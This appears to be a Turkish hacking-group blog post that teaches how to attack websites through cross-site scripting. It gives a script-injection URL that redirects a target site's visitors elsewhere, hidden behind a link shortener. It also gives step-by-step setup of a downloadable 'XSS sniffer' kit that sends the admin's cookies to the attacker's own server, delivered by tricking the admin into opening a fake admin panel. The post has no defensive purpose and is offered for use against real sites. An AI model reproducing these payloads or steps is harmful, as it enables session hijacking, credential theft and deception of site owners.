Tarih : | at : | Safemode : ON
> root@redhatz:~# Alımlar Başlamıştır. İletişim Bölümünden Alım Yapan Yöneticimize Ulaşabilirsiniz.
> root@redhatz:~# #redhatzopturkey 2016 Yeni Dönemi Artık Aktiftir. BİZİ TERCİH ETTİĞİNİZ İÇİN TEŞEKKÜRLER..



Başlık Yazar Yetki Comt Düzenlenen Kategori

Hedef Site Hacking V-3 RedAdalet rwxr-xr-x 0 08:13:00

Başlık Hedef Site Hacking V-3
Yetki rw-r--r--
Yazar RedAdalet
Zaman 08:13:00
Kategori
Share
Saldırı Türleri

1- Hedef siteye yönledirmek istediğiniz sayfayı koymak.

2- Sniffer aracılığıyla adminin kullanıcı adı ve şifresiniz almak.


Saldırı 1

- Hedef sitemiz www.hedefsite.com/index.php?id=12 olsun buradaki id’den sonraki değeri silip yerine <script>document.location.href= "www.yönledirmekistediğinizsite.com"</script>
şeklinde kurbana yedirebiliriz. Ancak vereceğiniz sitenin daha inandırıcı olması için bunu link kısaltma servisleri yoluyla kısaltabilirsiniz. Örnek : Bitly

Yani şöyle olacak : www.hedefsite.com/index.php?id=<script>document.location.href= "www.yönledirmekistediğinizsite.com"</script>

Saldırı 2

- XSS sniffer adminin kullanıcı adı ve şifresini cookie yoluyla alacağız. XSS Snifferı <a href= "https://www.mediafire.com/?d9n22pmzerdxhmv">https://www.mediafire.com/?d9n22pmzerdxhmv</a> indirebilirsiniz. Şimdi XSS Sniffer içindeki dosyaları ch.js ve index.html’deki bazı şeyleri değiştireceğiz.

- ch.js ’yi txt’e olarak kaydederek açalım http://siteadresiniz.com/Sniffer/sniffer.php?c diye bir yazı var bu yazıdaki siteadresiniz yazan kısma site adresinizi yazıyorsunuz Tabiki sniffer adı altında olarak. Sonra
ch.js olarak kaydedip çıkıyoruz.

- index.html’i txt olarak açıyoruz karşınıza http://xssadresi= diye bir yazı çıkacak buraya XSS açığını bulduğumuz sitenin adresini yazıyoryuz. Sonra http://siteadresiniz/Sniffer/ch.js siteadresi yazan kısma kendi 
sitenizin adresini yazıyorsunuz. index.html olarak kaydedip çıkıyorsunuz.

- Sonra sniffer adlı klosörümüzü FTP adresimize atıyoruz. http://siteadresiniz.com/Sniffer/log.php adresine giriyorsunuz. Kullanıcı Adı: admin Şifre: admin tabiki burada hedef site sahibine ait bilgi bulamayacaksınız.

- Amaç: index.html ’i hedef site adminine göndermektir burada admini sahte bir admin paneli karşılayacaktır. Tabi bunu yedirmek için biraz sosyal mühendislik gerekiyor. Admin index.html ’e tıkladıktan sonra 
cookie bilgileri http://siteadresiniz.com/Sniffer/log.php buraya gelecektir.

0 yorum:

Yorum Gönder

Makalemizi Okuduysanız Yorum yapabilirsiniz. Küfürlü Yorumlar Silinir Ve Kullanıcı Engellenir. İlginiz İçin Teşekkür Ederiz
#RedHatzOpTurkey

Kaydol: Kayıt Yorumları (Atom)
Blogger tarafından desteklenmektedir.